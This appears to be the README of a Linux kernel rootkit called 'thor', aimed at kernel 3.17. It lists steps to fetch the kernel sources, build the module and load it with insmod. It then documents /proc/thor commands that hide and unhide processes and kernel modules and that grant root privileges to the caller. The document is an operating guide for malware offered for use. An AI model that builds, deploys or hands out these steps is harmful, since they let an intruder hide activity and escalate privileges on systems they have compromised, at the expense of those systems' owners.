The Horrific Omnipotent Rootkit - or something like that, targeted at kernel 3.17 (archlinux LTS at the time of writing).
Apart from the linux kernel headers, the linux source code is required in order to build this rootkit since unexported code is used.
Just make sure /usr/src/linux points to the linux source directory of the
target kernel. Or you could simply change the Makefile.
# pacman -S abs linux-headers
# abs
# cd /var/abs/core/linux
# makepkg -o --asroot
# ln -s /var/abs/core/linux/src/linux-3.17 /usr/src/linux
$ cd /path/to/thor
$ make
# insmod thor.ko
usage:
echo hp PID > /proc/thor (hides process PID)
echo up PID > /proc/thor (unhides process PID)
echo upa > /proc/thor (unhide all PIDs)
echo hm MODULE > /proc/thor (hide module)
echo um MODULE > /proc/thor (unhide module)
echo uma > /proc/thor (unhide all modules)
echo root > /proc/thor (gain root privileges)
- Franz-Josef Haider
- Alex Hirsch